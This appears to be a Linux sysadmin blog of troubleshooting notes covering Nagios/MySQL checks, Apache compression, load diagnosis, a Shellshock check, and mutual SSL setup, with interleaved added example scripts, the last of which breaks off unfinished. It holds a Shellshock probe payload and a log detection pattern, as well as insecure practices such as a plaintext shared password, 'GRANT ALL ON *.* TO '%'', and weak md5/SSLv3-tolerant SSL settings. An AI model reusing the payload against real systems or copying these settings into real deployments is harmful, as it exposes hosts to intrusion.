command[check_mysql12]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode  bufferpool-hitrate  mysql12
command[check_mysql13]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   bufferpool-wait-free mysql13
command[check_mysql14]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   log-waits  mysql14
command[check_mysql15]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   tablecache-hitrate mysql15
command[check_mysql16]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   table-lock-contention mysql16
command[check_mysql17]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode  index-usage --warning 30: --critical 10: mysql17
command[check_mysql18]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode  tmp-disk-tables mysql18
command[check_mysql19]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   open-files  mysql19
command[check_mysql20]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   slow-queries  mysql20
command[check_mysql21]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   long-running-procs mysql21

On the Nagios server,
vi /usr/local/nagios/etc/nagios.cfg
/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg
/etc/init.d/nagios restart

Install check_mysql_health in /usr/local/nagios/libexec:

yum -y install cpan DBI*
cpan
install Time::HiRes
exit
yum -y install DBI*
cpan
install DBD::mysql
exit
ln -s /data/var/lib/mysql/mysql.sock /var/lib/mysql/mysql.sock

Ref :- https://labs.consol.de/nagios/check_mysql_health/


A few known errors:-
-------------------------------------------------------------
/usr/local/nagios/libexec/check_nrpe -H 10.111.111.33 -p 5666
CHECK_NRPE: Error - Could not complete SSL handshake.

vi /etc/xinetd.d/nrpe
only_from       = 127.0.0.1 10.11.22.22

service xinetd restart

/usr/local/nagios/libexec/check_nrpe -H 10.33.66.10 -p 5666
NRPE v2.14

Ref: http://assets.nagios.com/downloads/nagiosxi/docs/NRPE-Troubleshooting-and-Common-Solutions.pdf
-------------------------------------------------------------
File Integrity
CRITICAL - file does not exist!(Nagios)

ll /etc/httpd/conf.d/vhost.conf
ls: cannot access /etc/httpd/conf.d/vhost.conf: No such file or directory
touch /etc/httpd/conf.d/vhost.conf

/usr/local/nagios/libexec/check_md5.sh /etc/httpd/conf.d/vhost.conf
OK
-------------------------------------------------------------
mysql Access denied for user 'monitor'@'localhost' (using password: YES)

grant all  on *.* to 'nagiosusr'@'%' identified by 'passwrod';
FLUSH PRIVILEGES;
-------------------------------------------------------------------------
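The check_md5.sh referenced in nrpe.cfg and in the file-integrity error above is the author's own script and is not shown here. As an added example (not the author's script), the POSIX shell plugin below does the same kind of job: it compares a file's md5sum against a baseline assumed to live beside it at <file>.md5 (a placeholder convention) and follows the Nagios plugin exit-code convention of 0 OK, 1 WARNING, 2 CRITICAL, 3 UNKNOWN, so a missing file reports CRITICAL just as the error above does. It needs GNU md5sum; the function names and the sample config file are constructed.

```shell
#!/bin/sh
# Added example, not the author's check_md5.sh: a minimal NRPE file-integrity
# plugin. Baseline digest is assumed to be stored at <file>.md5 (placeholder
# convention). Exit codes: 0 OK, 1 WARNING, 2 CRITICAL, 3 UNKNOWN.

# md5 hex digest of a file, nothing else.
md5_of() {
    md5sum "$1" | cut -d ' ' -f 1
}

# Record the current digest as the baseline (run once, after a reviewed change).
record_baseline() {
    md5_of "$1" > "$1.md5"
}

# The check itself: prints one Nagios-style status line and returns the code.
check_md5() {
    file="$1"
    baseline="$1.md5"
    if [ ! -e "$file" ]; then
        echo "CRITICAL - file does not exist: $file"
        return 2
    fi
    if [ ! -r "$baseline" ]; then
        echo "UNKNOWN - no baseline for $file (run record_baseline first)"
        return 3
    fi
    current=$(md5_of "$file")
    expected=$(cat "$baseline")
    if [ "$current" = "$expected" ]; then
        echo "OK - $file matches baseline $expected"
        return 0
    fi
    echo "CRITICAL - $file changed: expected $expected got $current"
    return 2
}

# Demo on a constructed vhost file: baseline, verify, edit, verify, delete, verify.
# Prints the three exit statuses: "0 2 2".
demo_check_md5() {
    dir=$(mktemp -d)
    cfg="$dir/vhost.conf"
    printf '<VirtualHost *:80>\n  ServerName www.example.com\n</VirtualHost>\n' > "$cfg"
    record_baseline "$cfg"
    if check_md5 "$cfg" >/dev/null; then s1=0; else s1=$?; fi
    printf '# unexpected edit\n' >> "$cfg"              # constructed change
    if check_md5 "$cfg" >/dev/null; then s2=0; else s2=$?; fi
    rm -f "$cfg"
    if check_md5 "$cfg" >/dev/null; then s3=0; else s3=$?; fi
    rm -rf "$dir"
    echo "$s1 $s2 $s3"
}

# When run as a script with a path argument, behave like an NRPE plugin.
if [ "$#" -gt 0 ]; then
    check_md5 "$1"
    exit $?
fi
```

Wired in the same way as the author's entry, command[check_md5]=/usr/local/nagios/libexec/check_md5.sh /etc/my.cnf, the baseline file must be created once with record_baseline and refreshed only after an intended change.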

Tuesday, 3 March 2015

Data Compression Using mod_deflate


The mod_deflate module provides the DEFLATE output filter, which allows output from your server to be compressed before it is sent to the client over the network. mod_deflate ships with newer versions of Apache; it replaces mod_gzip, which was used with older versions of Apache.

Enabling Compression

By default the mod_deflate module is enabled in Apache. To make sure, check for the following line in the Apache configuration file:

LoadModule deflate_module modules/mod_deflate.so

Enable mod_deflate by editing the Apache configuration file (vhost.conf) for a particular website:

<Directory "/path/">
    <IfModule mod_mime.c>
        AddType application/x-javascript .js
        AddType text/css .css
    </IfModule>
    <IfModule mod_deflate.c>
        AddOutputFilterByType DEFLATE text/css application/x-javascript text/x-component text/html text/plain text/xml application/javascript
    </IfModule>
    Header append Vary User-Agent env=!dont-vary
</Directory>

OR

Enable mod_deflate by editing the main Apache configuration file (httpd.conf). Add the following lines to configure mod_deflate:

<IfModule mod_deflate.c>
  # compress text, html, javascript, css, xml:
  AddOutputFilterByType DEFLATE text/plain
  AddOutputFilterByType DEFLATE text/html
  AddOutputFilterByType DEFLATE text/xml
  AddOutputFilterByType DEFLATE text/css
  AddOutputFilterByType DEFLATE application/xml
  AddOutputFilterByType DEFLATE application/xhtml+xml
  AddOutputFilterByType DEFLATE application/rss+xml
  AddOutputFilterByType DEFLATE application/javascript
  AddOutputFilterByType DEFLATE application/x-javascript
  AddOutputFilterByType DEFLATE image/x-icon
</IfModule>

To set the no-gzip note for particular browsers, so that no compression is performed for them:

<Directory /var/www/html/>
    <IfModule mod_mime.c>
        AddType application/x-javascript .js
        AddType text/css .css
    </IfModule>
    <IfModule mod_deflate.c>
        AddOutputFilterByType DEFLATE text/css application/x-javascript text/x-component text/html text/plain text/xml application/javascript
        <IfModule mod_setenvif.c>
            BrowserMatch ^Mozilla/4 gzip-only-text/html
            BrowserMatch ^Mozilla/4\.0[678] no-gzip
            BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
        </IfModule>
    </IfModule>
    Header append Vary User-Agent env=!dont-vary
</Directory>

Restart the apache service to complete the process

# service httpd restart

Testing Compression

After configuring compression in Apache, you can confirm that the content sent by the web server is compressed by mod_deflate using the test at the URL below.
http://www.whatsmyip.org/http-compression-test/

Ref : http://tecadmin.net/how-to-enable-gzip-compression-on-apache/

Sunday, 1 March 2015

Troubleshooting high loads on Linux servers


The load average represents the average number of processes that have to wait for CPU time during the last 1, 5 or 15 minutes.

What causes high server loads?

Excessive usage of any of the following items can typically cause this issue:

CPU
memory (including swap)
disk I/O

How can I check these items?

That depends on whether you want to review current resource usage or historical resource usage.

Historical resource usage can be viewed using the "sar" utility.

The stats are collected when sysstat runs from cron (/etc/cron.d/sysstat). If crond is not running, sysstat will not be able to collect historical statistics.

For example, to view the load averages for your server from the 28th of the month:
sar -q -f /var/log/sa/sa28

Current day's load averages: sar -q
Current CPU usage: top -c
Historical CPU usage: sar -u
Current memory usage: free -m
Historical memory usage: sar -r (%memused), sar -S (%swpused)
Current disk I/O usage: iostat -x 1 10
Historical disk I/O usage: sar -d
Process list: ps auxwwwf
System's virtual memory statistics: vmstat 5 10 (10 samples at 5 second intervals)

There are various actions you can take to find the cause of your high server loads. Here is a partial list that will always be incomplete:

Check the MySQL process list using "mysqladmin processlist" (or just "mysqladmin pr" for short)
Check the MySQL process list using mytop
tail your logs! Listening to what your server says is very important. Is your server being brute forced?
Run dmesg and check for possible hardware issues
Use netstat to view the connections to your server

Here are some logs to check:

syslogs: /var/log/messages, /var/log/secure
SMTP logs: /var/log/exim_mainlog, /var/log/exim_rejectlog, /var/log/exim_paniclog
POP3/IMAP logs: /var/log/maillog
Apache logs: /usr/local/apache/logs/access_log, /usr/local/apache/logs/error_log, /usr/local/apache/logs/suexec_log, /usr/local/apache/logs/suphp_log
Website logs: /usr/local/apache/domlogs/ (use this to find sites with traffic in the last 60 seconds: find -maxdepth 1 -type f -mmin -1 | egrep -v 'offset|_log$')
cron logs: /var/log/cron

Ref :
http://forums.cpanel.net/f5/troubleshooting-high-server-loads-linux-servers-319352.html
http://www.linuxjournal.com/magazine/hack-and-linux-troubleshooting-part-i-high-load?page=0,0
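As an added example (not part of the original post), the following script finds the intervals in a saved `sar -q` report where the 1-minute load average exceeded the CPU count, and reports the current load per core. The sar output is constructed here in the layout sysstat prints on RHEL 6; the host name, times and thresholds are assumptions.

```shell
#!/bin/sh
# Added example: mine a `sar -q` report for high-load intervals and report
# the current load per core. Sample data below is constructed, not real.

# Print "<time> <ldavg-1>" for each interval whose 1-minute load average is
# above cores * factor (factor defaults to 1: more runnable work than CPUs).
sar_high_load_intervals() {   # usage: sar_high_load_intervals <sar -q output> <cores> [factor]
    awk -v cores="$2" -v factor="${3:-1}" '
        # header line: learn which column holds ldavg-1 (layouts differ by version)
        /ldavg-1/ { for (i = 1; i <= NF; i++) if ($i == "ldavg-1") col = i; next }
        # skip the banner, blank lines and the trailing Average: row
        /^Linux/ || /^Average:/ || NF == 0 { next }
        col && ($col + 0) > cores * factor {
            # time stamp is every field before runq-sz (col-2) and plist-sz (col-1)
            t = $1; for (i = 2; i <= col - 3; i++) t = t " " $i
            print t, $col
        }
    ' "$1"
}

count_high_load_intervals() {  # same arguments; just the number of intervals
    sar_high_load_intervals "$@" | wc -l | tr -d ' '
}

# Current 1-minute load average divided by online CPUs (Linux only).
current_load_per_core() {
    [ -r /proc/loadavg ] || { echo "no /proc/loadavg on this system" >&2; return 1; }
    cores="$(getconf _NPROCESSORS_ONLN 2>/dev/null || nproc)"
    awk -v c="$cores" '{ printf "%.2f\n", $1 / c }' /proc/loadavg
}

# Constructed `sar -q -f /var/log/sa/sa01` output for a 2-CPU host.
SAMPLE_SAR="$(mktemp)"
cat > "$SAMPLE_SAR" <<'EOF'
Linux 2.6.32-431.el6.x86_64 (web01)     03/01/2015      _x86_64_        (2 CPU)

12:00:01 AM   runq-sz  plist-sz   ldavg-1   ldavg-5  ldavg-15
12:10:01 AM         1       213      0.35      0.41      0.38
12:20:01 AM         2       220      0.92      0.77      0.55
12:30:01 AM         9       301      6.48      3.12      1.40
12:40:01 AM        11       340      8.10      5.60      2.90
12:50:01 AM         3       225      1.80      3.90      2.75
Average:            5       260      3.53      2.76      1.60
EOF

echo "intervals with ldavg-1 above 2 cores:"
sar_high_load_intervals "$SAMPLE_SAR" 2
echo "intervals with ldavg-1 above 3 x 2 cores:"
sar_high_load_intervals "$SAMPLE_SAR" 2 3
echo "current load per core: $(current_load_per_core || echo n/a)"
```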

Tuesday, 16 December 2014

A foreign key constraint fails in MySQL


Scenario:

drop database databasename;
ERROR 1217 (23000): Cannot delete or update a parent row: a foreign key constraint fails

Resolution:-

mysql> SET FOREIGN_KEY_CHECKS=0;
Query OK, 0 rows affected (0.00 sec)

mysql>  drop database databasename;
Query OK, 2 rows affected (0.06 sec)

mysql> SET FOREIGN_KEY_CHECKS=1;
Query OK, 0 rows affected (0.00 sec)

Ref : - http://stackoverflow.com/questions/3334619/cannot-delete-or-update-a-parent-row-a-foreign-key-constraint-fails

Thursday, 4 December 2014

Could not chdir to home directory : Permission denied

Scenario:
When connecting to the server over ssh:

login as: usrteam
eduteam@67.228.160.50's password:
Last login: Thu Dec  4 09:59:52 2014 from 14.141.35.194
Could not chdir to home directory /home/usrteam: Permission denied
-bash: /home/eduteam/.bash_profile: Permission denied
-bash-3.2$ pwd
/

Resolution :-

chown -R usrteam /home/usrteam
You have new mail in /var/spool/mail/root


Thursday, 27 November 2014

Couchbase Server

Couchbase Server is the world’s most complete, scalable, and highest performing NoSQL distributed database.

yum install -y pkgconfig

yum install openssl098e

wget http://packages.couchbase.com/releases/3.0.1/couchbase-server-enterprise-3.0.1-centos6.x86_64.rpm

rpm -ivh couchbase-server-enterprise-3.0.1-centos6.x86_64.rpm
Preparing...                ########################################### [100%]
Warning: Transparent hugepages may be used. To disable the usage
of transparent hugepages, set the kernel settings at runtime with
echo never > /sys/kernel/mm/transparent_hugepage/enabled
Warning: Transparent hugepages may be used. To disable the usage
of transparent hugepages, set the kernel settings at runtime with
echo never > /sys/kernel/mm/redhat_transparent_hugepage/enabled
Warning: Swappiness is not 0.
You can set the swappiness at runtime with
sysctl vm.swappiness=0
Minimum RAM required  : 4 GB
System RAM configured : 3.74 GB

Minimum number of processors required : 4 cores
Number of processors on the system    : 2 cores

   1:couchbase-server       ########################################### [100%]
Starting couchbase-server[  OK  ]

You have successfully installed Couchbase Server.
Please browse to http://mb1udarmiweb02.pearsontc.com:8091/ to configure your server.
Please refer to http://couchbase.com for additional resources.

Please note that you have to update your firewall configuration to
allow connections to the following ports: 11211, 11210, 11209, 4369,
8091, 8092, 18091, 18092, 11214, 11215 and from 21100 to 21299.

By using this software you agree to the End User License Agreement.
See /opt/couchbase/LICENSE.txt.

/etc/init.d/couchbase-server status
couchbase-server is running

Ref:
http://www.couchbase.com/nosql-databases/about-couchbase-server#ElasticScalability
http://docs.couchbase.com/couchbase-manual-2.5/cb-install/

Update time zone in Linux


date
Thu Nov 27 19:40:33 EST 2014

ls -l /etc/localtime
lrwxrwxrwx 1 root root 39 Nov 27 19:40 /etc/localtime -> /usr/share/zoneinfo/Australia/Melbourne

unlink /etc/localtime

ln -s /usr/share/zoneinfo/Asia/Kolkata /etc/localtime

ls -l /etc/localtime
lrwxrwxrwx 1 root root 32 Nov 27 14:08 /etc/localtime -> /usr/share/zoneinfo/Asia/Kolkata

date
Thu Nov 27 14:09:15 IST 2014

Ref:- http://www.linuxnix.com/2014/11/linuxunix-how-update-timezone-in-a-system.html?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+TheLinuxJuggernaut+%28The+Linux+Juggernaut%29

Wednesday, 19 November 2014

PHP Warning: PHP Startup: Unable to load dynamic library

Scenario :-

php -v

PHP Warning:  PHP Startup: Unable to load dynamic library '/usr/lib64/php/modules/module.so' - /usr/lib64/php/modules/module.so: cannot open shared object file: No such file or directory in Unknown on line 0
PHP 5.3.3 (cli) (built: Sep 10 2014 05:27:26)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies

cat /etc/php.d/mcrypt.ini
; Enable mcrypt extension module
extension=module.so

but module.so does not exist in /usr/lib64/php/modules/

Resolution :-
Uninstall php-mcrypt and reinstall the correct rpm:

rpm -e php-mcrypt-5.3.3-1.el6.rf.x86_64
wget ftp://ftp.pbone.net/mirror/download.fedora.redhat.com/pub/fedora/epel/6/x86_64/php-mcrypt-5.3.3-3.el6.x86_64.rpm
rpm -ivh php-mcrypt-5.3.3-3.el6.x86_64.rpm

php -v
PHP 5.3.3 (cli) (built: Sep 10 2014 05:27:26)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies

cat /etc/php.d/mcrypt.ini
; Enable mcrypt extension module
extension=mcrypt.so

now mcrypt.so exists at /usr/lib64/php/modules/mcrypt.so


Monitor MySQL performance with innotop


Innotop is an excellent command line program, similar to the top command, for monitoring local and remote MySQL servers running the InnoDB engine.

yum install innotop

innotop -u root -p 'mysqlpassword'

Innotop Help
Press “?” to get the summary of command line options and usage.

Switch to a different mode:
   A  Dashboard         I  InnoDB I/O Info     Q  Query List
   B  InnoDB Buffers    K  InnoDB Lock Waits   R  InnoDB Row Ops
   C  Command Summary   L  Locks               S  Variables & Status
   D  InnoDB Deadlocks  M  Replication Status  T  InnoDB Txns
   F  InnoDB FK Err     O  Open Tables         U  User Statistics

Actions:
   d  Change refresh interval        p  Pause innotop
   k  Kill a query's connection      q  Quit innotop
   n  Switch to the next connection  x  Kill a query

Other:
 TAB  Switch to the next server group   /  Quickly filter what you see
   !  Show license and warranty         =  Toggle aggregation
   #  Select/create server groups       @  Select/create server connections
   $  Edit configuration settings       \  Clear quick-filters
Press any key to continue

Non-Interactively

innotop -u root -p 'mysqlpassword' --count 5 -d 1 -n

Monitor Remote Database

innotop -u username -p password -h hostname

Ref : -
http://www.tecmint.com/install-innotop-to-monitor-mysql-server-performance/
http://linux.die.net/man/1/innotop

Wednesday, 22 October 2014

SeaLion Monitoring in Linux

Install and configure SeaLion

wget https://s3.amazonaws.com/sealion.com/3.2.3/sealion-agent-3.2.3-noarch.tar.gz
tar -xzvf sealion-agent-3.2.3-noarch.tar.gz
cd sealion-agent

sudo ./install.sh -o 299ade98-ab92-44bd-a9e6-3cefd1a9aeda

Dependency: the SeaLion agent requires Python version 2.6 or above.

Ref : -
https://www.youtube.com/watch?v=fLqVQd1SMmY
https://sealion.com

Monday, 29 September 2014

Bash Code Injection Vulnerability


rpm -qa | grep bash

bash-3.2-32.el5

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
You have new mail in /var/spool/mail/root

yum upgrade bash

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'

rpm -qa | grep bash
bash-3.2-33.el5.1

Ref :- https://access.redhat.com/articles/1200223
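As an added example (not part of the original post), here are two defender-side checks around the bash function-import bug shown above: a wrapper around the same probe the post uses, and a scan of web server access logs for the "() {" marker that a probe leaves in request headers. The access log lines are constructed for this example; the IPs and paths are not real.

```shell
#!/bin/sh
# Added example: check the local bash, then look for probe traffic in logs.
# The probe string is the one from the post; log lines are constructed.

# 1. Does the installed bash still execute code appended to an exported
#    function definition? A fixed bash prints only "this is a test" and
#    warns on stderr. Returns 0 when patched, 1 when vulnerable.
bash_is_patched() {
    out="$(env x='() { :;}; echo vulnerable' bash -c 'echo this is a test' 2>/dev/null)"
    case "$out" in
        *vulnerable*) return 1 ;;
        *)            return 0 ;;
    esac
}

# 2. CGI hands request headers (User-Agent, Referer, ...) to scripts as
#    environment variables, so a probe shows up in the quoted fields of the
#    combined log format. Match the "() {" marker literally.
SHELLSHOCK_MARKER='() {'
scan_log_for_shellshock() {   # usage: scan_log_for_shellshock <access log>
    grep -F -- "$SHELLSHOCK_MARKER" "$1"
}
count_shellshock_hits() {     # number of matching lines
    scan_log_for_shellshock "$1" | wc -l | tr -d ' '
}
shellshock_source_ips() {     # "<count> <ip>" per source address, busiest first
    scan_log_for_shellshock "$1" | awk '{ print $1 }' | sort | uniq -c | sort -rn |
        awk '{ print $1, $2 }'
}

# Constructed sample in Apache combined log format (not real traffic).
SAMPLE_LOG="$(mktemp)"
cat > "$SAMPLE_LOG" <<'EOF'
10.0.0.5 - - [29/Sep/2014:10:01:02 +0530] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [29/Sep/2014:10:01:07 +0530] "GET /cgi-bin/status HTTP/1.1" 200 87 "-" "() { :;}; echo vulnerable"
10.0.0.9 - - [29/Sep/2014:10:01:09 +0530] "GET /cgi-bin/status HTTP/1.1" 200 87 "() { :;}; echo vulnerable" "curl/7.29.0"
10.0.0.7 - - [29/Sep/2014:10:02:00 +0530] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.3 - - [29/Sep/2014:10:02:31 +0530] "GET /cgi-bin/status HTTP/1.1" 200 87 "-" "() { :;}; echo vulnerable"
EOF

if bash_is_patched; then echo "local bash: patched"; else echo "local bash: VULNERABLE"; fi
echo "probe lines in log: $(count_shellshock_hits "$SAMPLE_LOG")"
echo "probe sources:"
shellshock_source_ips "$SAMPLE_LOG"
```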

Wednesday, 24 September 2014

Install mod_ssl on Apache2 - Ubuntu

Steps to install mod_ssl on Apache2 - Ubuntu

apt-get install mod_ssl

dpkg -S mod_ssl.so
apache2.2-bin: /usr/lib/apache2/modules/mod_ssl.so

a2enmod ssl
Module ssl already enabled

To make sure that the SSL module was loaded properly :

apache2ctl -t -D DUMP_MODULES | grep ssl
[Thu Sep 25 11:28:16 2014] [warn] NameVirtualHost *:80 has no VirtualHosts
Syntax OK
ssl_module (shared)



Mutual SSL authentication in Ubuntu

Two-way SSL using CA certificates

 cd /root

 mkdir CA

 cd CA

 mkdir newcerts private

vi openssl.cnf

#
# OpenSSL configuration file.
#
# Establish working directory.
dir = .
default_bits = 1024 # Size of keys (the commands below override this with 2048-bit keys)
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
req_extensions = v3_req

[ ca ]

default_ca = CA_default

[ CA_default ]

serial = $dir/serial
database = $dir/index.txt
new_certs_dir = $dir/newcerts
certificate = $dir/cacert.pem
private_key = $dir/private/cakey.pem
default_days = 365
default_md = md5
preserve = no
email_in_dn = no
nameopt = default_ca
certopt = default_ca
policy = policy_match

[ policy_match ]

countryName = match
stateOrProvinceName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

[ req ]

default_md = sha1
distinguished_name = req_distinguished_name

[ req_distinguished_name ]

countryName = Country
countryName_default = IN
countryName_min = 2
countryName_max = 2
localityName = Locality
stateOrProvinceName = State or Province
stateOrProvinceName_default = Karnataka
localityName_default = Bangalore
organizationName = Organization
organizationName_default = edurite
commonName = Common Name
commonName_max = 64

[ certauth ]

subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always
basicConstraints = CA:true

[ server ]

basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = serverAuth
nsCertType = server

[ client ]

basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = clientAuth
nsCertType = client

[ v3_req ]

basicConstraints = CA:FALSE
subjectKeyIdentifier = hash

Generate the self-signed CA certificate, then the server and client certificates:

 openssl req -config ./openssl.cnf -newkey rsa:2048 -nodes -keyform PEM -keyout ca.key -x509 -days 3650 -extensions certauth -outform PEM -out ca.cer

 openssl genrsa -out server.key 2048

 openssl req -config ./openssl.cnf -new -key server.key -out server.req

 openssl x509 -req -in server.req -CA ca.cer -CAkey ca.key -set_serial 100 -extfile openssl.cnf -extensions server -days 365 -outform PEM -out server.cer

 rm server.req

 openssl genrsa -out client.key 2048

openssl req -config ./openssl.cnf -new -key client.key -out client.req

 openssl x509 -req -in client.req -CA ca.cer -CAkey ca.key -set_serial 101 -extfile openssl.cnf -extensions client -days 365 -outform PEM -out client.cer

 openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12

 rm client.key client.cer client.req

vi /etc/apache2/sites-available/default

<VirtualHost *:443>
        ServerAdmin webmaster@localhost
        ServerName 10.98.33.136:443

        DocumentRoot /var/www
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>

        ErrorLog ${APACHE_LOG_DIR}/error.log

        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn

        CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>
        SSLEngine on
        LogLevel warn
        # -SSLv2 disables only SSLv2; SSLv3 stays enabled with this line
        SSLProtocol all -SSLv2
        SSLCipherSuite HIGH:MEDIUM
        # Client certificate verification needs the CA that issued the client
        # certificates, so SSLCACertificateFile must be set, not commented out
        SSLVerifyClient require
        SSLVerifyDepth 10
        SSLCertificateFile /etc/apache2/ssl/apache.crt
        SSLCertificateKeyFile /etc/apache2/ssl/apache.key
        SSLCACertificateFile /etc/apache2/ssl/ca.cer
</VirtualHost>

/etc/init.d/apache2 restart

./OpenSSL_Client rname@some.com 365 passwd /var/www/html/CERT

Now Import the P12 file to the browser.

Ref :- http://www.flatmtn.com/article/setting-openssl-create-certificates

Tuesday, 23 September 2014

Two-way SSL authentication


Two-way SSL authentication, also called mutual SSL authentication or client
authentication, works by having the client prove its identity to the SSL
server with a client certificate.

All certificates will be issued using the OpenSSL application and the
openssl.cnf configuration file below.

 cd /root

 mkdir CA

 cd CA

 mkdir newcerts private

 vi /root/CA/openssl.cnf

#
# OpenSSL configuration file.
#
# Establish working directory.
dir = .
default_bits = 1024 # Size of keys (the commands below override this with 2048-bit keys)
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
req_extensions = v3_req

[ ca ]

default_ca = CA_default

[ CA_default ]

serial = $dir/serial
database = $dir/index.txt
new_certs_dir = $dir/newcerts
certificate = $dir/cacert.pem
private_key = $dir/private/cakey.pem
default_days = 365
default_md = md5
preserve = no
email_in_dn = no
nameopt = default_ca
certopt = default_ca
policy = policy_match

[ policy_match ]

countryName = match
stateOrProvinceName = match
organizationName = match
organizationalUnitName = optional
commonName = supplied
emailAddress = optional

[ req ]

default_md = sha1
distinguished_name = req_distinguished_name

[ req_distinguished_name ]

countryName = Country
countryName_default = IN
countryName_min = 2
countryName_max = 2
localityName = Locality
stateOrProvinceName = State or Province
stateOrProvinceName_default = Karnataka
localityName_default = Bangalore
organizationName = Organization
organizationName_default = edurite
commonName = Common Name
commonName_max = 64

[ certauth ]

subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always
basicConstraints = CA:true

[ server ]

basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = serverAuth
nsCertType = server

[ client ]

basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment, dataEncipherment
extendedKeyUsage = clientAuth
nsCertType = client

[ v3_req ]

basicConstraints = CA:FALSE
subjectKeyIdentifier = hash

 echo '01' > serial
 touch index.txt

To generate the self-signed CA certificate, then the server and client certificates:

 openssl req -config ./openssl.cnf -newkey rsa:2048 -nodes -keyform PEM -keyout ca.key -x509 -days 3650 -extensions certauth -outform PEM -out ca.cer

 openssl genrsa -out server.key 2048

 openssl req -config ./openssl.cnf -new -key server.key -out server.req

 openssl x509 -req -in server.req -CA ca.cer -CAkey ca.key -set_serial 100 -extfile openssl.cnf -extensions server -days 365 -outform PEM -out server.cer

 rm server.req

 openssl genrsa -out client.key 2048

openssl req -config ./openssl.cnf -new -key client.key -out client.req

 openssl x509 -req -in client.req -CA ca.cer -CAkey ca.key -set_serial 101 -extfile openssl.cnf -extensions client -days 365 -outform PEM -out client.cer

 openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12

 rm client.key client.cer client.req

vi /etc/httpd/conf.d/ssl.conf

LoadModule ssl_module modules/mod_ssl.so
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl .crl

Listen 443

<VirtualHost 172.16.0.14:443>
DocumentRoot "/var/www/SSL/digitally"
CheckSpelling on
DirectoryIndex opsindex.php
ServerName 172.16.0.14
ServerAdmin root@localhost
ErrorLog logs/ssl_error_log
TransferLog logs/ssl_access_log
LogLevel warn
SSLEngine on
SSLProtocol all -SSLv2
SSLCipherSuite HIGH:MEDIUM
SSLCertificateFile /etc/httpd/conf/ssl/server.cer
SSLCertificateKeyFile /etc/httpd/conf/ssl/server.key
SSLVerifyClient require
SSLVerifyDepth 10
SSLCACertificateFile /etc/httpd/conf/ssl/ca.cer
<Files ~ "\.(cgi|shtml|phtml|php3?)$">
SSLOptions +StdEnvVars
</Files>
SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
CustomLog logs/ssl_request_log \
"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
</VirtualHost>

 httpd -S

 /etc/init.d/httpd restart

 mkdir -p /var/www/html/CERTS

./OpenSSL_Client rname@some.com 365 passwd /var/www/html/CERTS

Now Import the P12 file to the browser.

Ref :- http://www.flatmtn.com/article/setting-openssl-create-certificates
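As an added example serving both the "Mutual SSL authentication in Ubuntu" and "Two-way SSL authentication" posts (it is not the posts' own code or the OpenSSL_Client script), the script below builds a throwaway CA, server certificate and client certificate with the same [certauth], [server] and [client] extension sections, exports the client .p12, and then verifies each certificate for its intended purpose, which is what Apache checks with SSLVerifyClient require and SSLCACertificateFile. It assumes only the openssl command-line tool; subject names, the serials and the .p12 password are constructed, and sha256 is used instead of the posts' md5/sha1 defaults.

```shell
#!/bin/sh
# Added example: throwaway PKI built the way the posts do it, plus purpose
# checks. Everything lives in a temporary directory; nothing touches /root/CA.

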